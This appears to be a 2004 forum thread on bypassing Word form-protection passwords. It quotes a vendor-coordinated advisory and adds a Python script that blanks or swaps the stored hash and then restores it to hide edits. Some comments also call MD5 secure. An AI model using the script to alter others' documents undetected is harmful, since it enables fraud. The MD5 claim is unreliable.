Microsoft Word Forms Passwords Hacked
An anonymous reader notes: "SecurityFocus has published a hack that can be used to unlock Microsoft Word documents that have been password protected. The 'secure' file can easily be edited and the original password re-inserted, removing any trace of the modification. A ZDNet UK article says Dell uses password protected Word files to send quotes, which could make for a messy legal battle." This feature, known as 'Password to Modify', is not the password protection on the document itself, just the protection that restricts unauthorized editing of the file. This hack allows someone to download such a file, edit it, and restore the password...effectively allowing changes to the file to go potentially unnoticed.
There have been utilities to obtain Word passwords for quite a while. I've tested mine on Office 2000 and XP protected documents and had great success.
What's odd: The password returned by my tool of choice is not the same as the one actually stored - but when I enter this new password OR the original password into Word, the document is successfully unprotected. Some sort of odd math that makes more than one password work?
Example - I protected both a Word 2000 and Word 2002 document with the password "test" then ran them through my cracker. The cracker returned the password "QFQDOBCTGLHGEE" virtually instantly for both documents. Oddly enough, this new unusual password successfully unlocked both Word documents using Tools > Unprotect Document. Subsequent testing reveals that the original password will also unprotect the document.
So, if such passwords can easily be bypassed anyway - what does this really change?
I should note that I'm using a Passware product called Office Key.
This crack just takes what has been commercially available for quite some time and moves it into the public arena.
Josh
According to Microsoft, the password protection feature on Word is not intended to be secure, but should be regarded as a means to protect documents against accidental modification. I use Word and don't ever recall being advised of this, but then I suppose the EULA does warn users never to actually rely on the software for anything important.
I never expected the protection in Word to be anything special, but sometimes (as shown here by Dell) it's better to have no security than false security because that way you take greater care.
But for those of you who never RTA, here is what was the highlight for me:
Passwords can use a one way function.
Take the source string, do a bunch of 'stuff' to it, stuff that isn't easy to undo.
You can throw out some data too.
You end up with a new string, but since you threw out some information, you end up unable to reverse it.
Even if you know the end result, and the formula, you can't guess the password. You'd have to brute force it.
With slow computers, this was a very good obstacle. Now we use fancier algorithms, and it is still okay.
I'm not a math guy, go read crypto books if you want the 'real' explanation
Come to think of it, I can't think of a real position where this could be a problem. What would someone do, host protected
You've obviously never been in the real world.
To someone like you or me, Word is simply a word processing program. But to office workers across the country....
Here's a list of things I've seen people use MS Word for:
Spreadsheet. Hit tab, enter a value, add them up by hand. Excel is 'too confusing'
Creating GIANT tables and using them for inventory, rather than an Access database
Creating a 3,000 page document and keeping time/attendance records for ~ 250 employees. And wonder why it takes 10 minutes to load, and 10 minutes to save, doesn't scroll right....
I work with Dell for our workstation and laptop purchases and not once in the last 3 years have they sent me a quote in a Word document.
They have a system that links the quote with your customer ID and gets generated as an HTML file which gets emailed to you. All automagically.
To whoever thought they could change a Word document quote and expect to get that price, I've got some beachfront property to sell you in Kansas. Silly fool.
It's old news -- that's why Microsoft prefers PDF for the really important stuff.
2003-11-27, 10:30 UTC Microsoft notified to: secure microsoft com
2003-11-27 confirmed receipt from: secure microsoft com
2003-12-03 Note from Microsoft, Form protection "is not intended as a full-proof protection for tampering or spoofing, this is merely a functionality to prevent accidental changes of a document", request additional time to update Microsoft Knowledge Base article.
Targeting beginning of January 2004 for release of this advisory.
from: "Magnus"
2003-12-08 Microsoft has already released the KB article (or added a warning to an existing article). Read the KB article at http://support.microsoft.com/?id=822924
from: "Magnus"
Was this ever really meant to be really truly secure? "security" features like that have always been lame at best and equivalent to luggage locks. These passwords have always been susceptible to brute force attacks. Anyone really serious about keeping documents safe puts them into a source control program. There are many ways to pick at MS's security, this is not one of them. But if you are trusting these measures for really secure documents, I highly suggest you get your valuables out of the pink plastic safe you won at the county fair last year.
To: BugTraq /tdk :-)
Subject: Microsoft Word Protection Bypass
Date: Jan 2 2004 10:51AM
Author: Thorsten Delbrouck-Konetzko
Hi all,
Microsoft Word provides an option to protect "forms" by password. This is
used to ensure that unauthorized users cannot manipulate the contents of
documents except within specially designed "form" areas. This feature is
also often used to protect documents which do not even have form areas
(quotations/offers etc.).
This form protection can easily be removed without any additional tools
(apart from a hex-editor).
Please find the full advisory attached.
best regards,
Thorsten Delbrouck
Chief Information Officer
Guardeonic Solutions AG
Rosenheimer Str. 116
D-81669 Munich
Security Advisory #01-2004
Advisory Name: Microsoft Word Form Protection Bypass
Release Date: 2004-01-02
Affected Product: Microsoft Word
Platform: Microsoft Windows, probably Apple Mac OS
Version: tested on 2000, 2002 (XP), 2003; probably other versions vulnerable as well
Severity: Document ("Form") protection can be easily removed
Author: Thorsten Delbrouck
Vendor Communication:
2003-11-27, 10:30 UTC Microsoft notified to: secure microsoft com
2003-11-27 confirmed receipt from: secure microsoft com
2003-12-03 Note from Microsoft, Form protection "is not intended as a full-proof protection for tampering or spoofing, this is merely a functionality to prevent accidental changes of a document", request additional time to update Microsoft Knowledge Base article. Targeting beginning of January 2004 for release of this advisory.
from: "Magnus"
2003-12-08 Microsoft has already released the KB article (or added a warning to an existing article). Read the KB article at http://support.microsoft.com/?id=822924
from: "Magnus"
Overview:
Word provides an option to protect "forms" by password. This is used
to ensure that unauthorized users can not manipulate the contents of
documents except within specially designed "form" areas. This feature
is also often used to protect documents which do not even have form
areas (quotations/offers etc.).
(Word users will find this option on the "Tools" menu, entry "Protection"; select "Forms" there and provide a password.) If a Word document is protected by this mechanism, users cannot select parts of the text or place the cursor within the text, thus they cannot make any changes to the document.
Description:
When saving protected Word-documents as html-files, Word adds a
"checksum" of the password (enclosed in a proprietary tag) to the
code. The checksum format looks somewhat like CRC32 but currently
there are no further details available. The same checksum can be
found within the original Word document (hexadecimal view). If this
"checksum" is replaced by 0x00000000 the password equals an empty
string.
Example:
1.) Open a protected document in MS Word
2.) Save as "Web Page (*.htm; *.html)", close Word
3.) Open html-document in any Text-Editor
4.) Search "<w:UnprotectPassword>" tag, the line reads something like that: <w:UnprotectPassword>ABCDEF01</w:UnprotectPassword>
5.) keep the "password" in mind
6.) Open original document (.doc) with any hex-editor
7.) search for hex-values of the password (reverse order!)
8.) Overwrite all 4 double-bytes with 0x00, Save, Close
9.) Open document with MS Word, Select "Tools / Unprotect Document"
(password is blank)
Variation:
If the 8 checksum bytes are replaced with the checksum of a known
password it should be fairly easy to unprotect the document, make any
necessary changes, save, close and reset the password to the original
(unknown!) password by simply restoring the original values. Document
changed without even knowing the password. Nasty.
(Note: Take care to get file properties (author, organisation,
date/time etc.) right.)
Solution:
No solution is currently available. Do not rely on the "Protect
Forms" mechanism to protect a Word document against changes.
Credits:
Magnus from the Microsoft Security Response Center for his fast
responses and for showing a decent sense of humour.
If I recall, openoffice/staroffice can open "encrypted" Word and Excel documents without the requirement of a password. I know this used to work for older versions...
Not since Office 98...
Full thing.
-----------------------
1.) Open a protected document in MS Word
2.) Save as "Web Page (*.htm; *.html)", close Word
3.) Open html-document in any Text-Editor
4.) Search "<w:UnprotectPassword>" tag, the line reads something like
that: <w:UnprotectPassword>ABCDEF01</w:UnprotectPassword>
5.) keep the "password" in mind
6.) Open original document (.doc) with any hex-editor
7.) search for hex-values of the password (reverse order!)
8.) Overwrite all 4 double-bytes with 0x00, Save, Close
9.) Open document with MS Word, Select "Tools / Unprotect Document"
(password is blank)
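The nine steps above, and the advisory's "Variation" (patch in the hash of a password you do know, edit, save, then put the original bytes back), can be scripted. The following is an added example written for this page; it is not code from the advisory, from Slashdot, or from any Microsoft tool. It assumes only what the advisory states: the value appears in the HTML export inside a <w:UnprotectPassword> tag and in the .doc as the same four bytes in reverse (little-endian) order. The HTML snippet and the .doc bytes it works on are constructed, and the values ABCDEF01 and 12345678 are made up; the "Save as Web Page" export (steps 1-3) and the editing in Word (step 9) still happen in Word itself.

```python
"""Patch the form-protection "checksum" in a Word 97-2003 .doc, following
the advisory's steps.  Added example: all sample data below is constructed."""
import re
import struct
from typing import List, Tuple

# Constructed stand-in for what Word writes into a "Save as Web Page"
# export of a protected document (the hash value is made up).
SAMPLE_HTML = b"""<w:WordDocument>
 <w:DocumentProtection>Forms</w:DocumentProtection>
 <w:UnprotectPassword>ABCDEF01</w:UnprotectPassword>
</w:WordDocument>"""

# Constructed stand-in for the .doc: OLE2 compound-file magic, padding, and
# the same value stored little-endian (reverse byte order, advisory step 7).
OLE2_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"
SAMPLE_DOC = (
    OLE2_MAGIC
    + b"\x00" * 16
    + b"\x01\xef\xcd\xab"          # 0xABCDEF01 as stored on disk, offset 24
    + b"\x00" * 8
    + b"Quotation: total EUR 1000.00\x00\x00\x00\x00"
)

UNPROTECT_TAG = re.compile(
    rb"<w:UnprotectPassword>([0-9A-Fa-f]{8})</w:UnprotectPassword>")


def extract_hash_from_html(html: bytes) -> int:
    """Step 4: pull the 8 hex digits out of the HTML export."""
    m = UNPROTECT_TAG.search(html)
    if m is None:
        raise ValueError("no <w:UnprotectPassword> tag in HTML export")
    return int(m.group(1), 16)


def hash_to_doc_bytes(value: int) -> bytes:
    """Step 7: the .doc holds the 32-bit value little-endian, so the bytes
    appear in the reverse of the order the hex text shows them."""
    return struct.pack("<I", value)


def find_hash_offsets(doc: bytes, value: int) -> List[int]:
    """Every offset at which the stored form of `value` occurs."""
    needle = hash_to_doc_bytes(value)
    offsets, start = [], 0
    while (i := doc.find(needle, start)) >= 0:
        offsets.append(i)
        start = i + 1
    return offsets


def patch_hash(doc: bytes, old: int, new: int = 0) -> Tuple[bytes, List[int]]:
    """Step 8: overwrite the stored hash.  new=0 makes the password empty
    (the advisory's main case); any other value is the "Variation", where
    `new` is the hash of a password you know.  Returns the patched bytes and
    the offsets touched.  Refuses old=0: four zero bytes occur all over a
    .doc, so an empty-password hash cannot be located by searching."""
    if not doc.startswith(OLE2_MAGIC):
        raise ValueError("not an OLE2 compound file (.doc expected)")
    if old == 0:
        raise ValueError("cannot search for an all-zero hash; use a known "
                         "non-zero hash (Variation) if you need to restore")
    offsets = find_hash_offsets(doc, old)
    if not offsets:
        raise ValueError("stored hash %08X not found" % old)
    buf = bytearray(doc)
    for off in offsets:
        buf[off:off + 4] = hash_to_doc_bytes(new)
    return bytes(buf), offsets


if __name__ == "__main__":
    stored = extract_hash_from_html(SAMPLE_HTML)
    # Main case: blank the password, then use Tools / Unprotect Document.
    blank, where = patch_hash(SAMPLE_DOC, stored)
    print("hash %08X found at offset(s) %s; password is now empty" % (stored, where))
    # Variation: 0x12345678 stands in for the hash of a password you know.
    # Edit and save the swapped document in Word, then, because the known
    # hash is a non-zero value you can search for, swap the original back.
    swapped, _ = patch_hash(SAMPLE_DOC, stored, new=0x12345678)
    restored, _ = patch_hash(swapped, 0x12345678, new=stored)
    print("round trip restores original bytes:", restored == SAMPLE_DOC)
```

The reason the script refuses to search for a zero hash is the practical difference between the two routes in the advisory: blanking the password is fine if you only need to read or edit, but if you want to hand the file back with the original, unknown password in place you must patch in a distinctive known value first, since after Word re-saves the document the only way to find the field again is to search for that value. The advisory's reminder about file properties (author, organisation, timestamps) still applies; this script touches nothing but the four hash bytes.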
I've modified "protected" Word documents by opening them in Notepad and scrolling through the last few lines until I find a string of plain text that looks like a password (i.e. isn't a username or Word setting). Although this takes a bit more time for the searching, there's no need to modify the password at all.
>removing any trace of the modification.
Modification can be checked using a checksum of the original and suspect files. That is, if the user knows how to obtain the checksums.
I saw a good point the other day that US export laws on cryptography were fairly stupid when you consider that other countries have the skills/intelligence to develop strong cryptography outside the US in the first place. For example, RSA was originally developed in the UK.
At GCHQ, where it was kept under lock and key, and no one knew about it until long after Rivest, Adleman and Shamir had published their paper.
Jedidiah
pkzip files have always had genuine data encryption (the sort that isn't viewable with a hex editor), but that encryption has traditionally been quite weak. I'm unsure if the new schemes are any better, but I doubt many people use that aspect of pkzip files anyway.
So long as we ride the Moore Curve, overkill degrades to underkill at a rate of about one bit per 18 months. So if you want your document to be secure in perpetuity, you'd better use a lot of bits.
Take something like 256 bits, which is quite commonly available, and you'll see that brute forcing it requires you to turn each atom on earth into a computer, and compute with each of the atoms of the earth (2^171 atoms) at 1 THz (2^40) for 1 million years (2^45) in order to brute force *one* key.
Now, if that is too unsecure for you, I recommend you seek professional help. Fast.
Kjella
I don't know what "both ways" you're talking about.
I can assure you it is possible to have secure encryption, secure digital signatures without DRM.
GPG and PGP are examples of both, without DRM.
Try reading the book Applied Cryptography.
It would most certainly be possible to encrypt a document using a password, using a secure encryption mechanism, such that it cannot be decrypted without the password.
Similarly, it is possible to take a secure (i.e. MD5) hash of a document, and then compare that document if it comes back to you to be sure it is the original. Applied Cryptography details numerous protocols for conducting business, signing documents, and many other useful things. All securely. All without DRM.
XOR against a passphrase is weak.
XOR against a repeating secure (irreversible) hash of the password is technically weak but in practice very strong unless the message is dozens of times longer than the hash.
XOR against a successive concatenation of secure hashes is strong, fast, and simple. There is no reason to believe 3DES is any stronger. Plus, it's the same algorithm for encrypting and decrypting. Pseudocode:
There is a thread about this vulnerability on bugtraq. I would suggest you go there for first hand info.
A one-way function is simply some function which is not one-to-one. For example, consider the length function L which maps words to integers, e.g. L("bob")=3, L("A")=1.
Think this one through. The algorithms used to sign PGP/GPG messages are one way. The reason being is that it's hard to come up with something else that maps to the same value.
Using your length function example, considering the two e-mails from Alice
"I love Bob"
"I hate Bob"
Would both parse to 1 4 3. Which means Eve could flip Alice's feelings for Bob, without invalidating the signature.
That, my friend, is a crappy 'one-way' function. So crappy that it's not really one-way.
The "multiple inputs give the same output" thing just means it's non-linear. And all that that implies.
Excellent point. The "lock" that has been broken is just that -- a lock, designed such that those who only use Word to edit the file can't edit the file without the password. This is the same as saying that a lock on a door is only effective against those who only come in through the doorway. The file isn't encrypted in any way, just locked. It is just a flag that tells Word to not let you view or edit the file until you've provided the password.
There have always been a lot of ways around this lock. First, you can always generate a matching password (equivalent to picking the lock on a door). Or you can just zero out the password field in the file (the point of the "Security Advisory" linked in the article), which is like taking a door off of its hinges (I'm nearing metaphor breakdown here, but you'll just have to deal with it). Or you can just use some other editor (a hacked version of Word, a hex editor, or an Open Source editor) that lacks the programming to enforce the lock flag. That would be like ignoring the door and going for an open window or the back door or something. (Metaphor over, you can open your eyes now.)
Remember that the file format was designed back when any non-trivial encryption was evil, and exporting it was considered espionage. Also remember that Word is targeted at students, teachers, and soccer moms just as much as it is targeted at CEOs and lawyers. The average Joe is satisfied with the trivial lock, and in fact would probably prefer less security, since that means if he/she is careless and forgets the password, the document can still be recovered (cost/benefit analysis: potential for damage if the document is opened by an outsider * probability that it will be opened by an outsider --versus-- potential for damage if my password is lost * probability that I will lose my password). Most people aren't protecting documents against evil government agents -- usually it is just their little brother or the guy in the next office that they need to keep out.
Anyway, the bottom line is that this was never meant to be a safe deposit box, not even barbed wire and chain link. It is a simple lock, and just as a good screwdriver or a pair of bolt cutters can get you past a lock in no time, a real computer person would never even blink if confronted by something like this, and Microsoft never advertised it as anything else.
On the other hand, they are now advertising new encryption and protection features that are the real thing. This time, they are making a strong claim of decent encryption: if you don't have the appropriate certificate, you're going to have a very hard time opening this document. Of course, once it is opened, the "Do Not Forward" or "Do Not Save Unencrypted" flags are once again just trivial locks, but that is a separate issue -- you have to open the document before you could do that.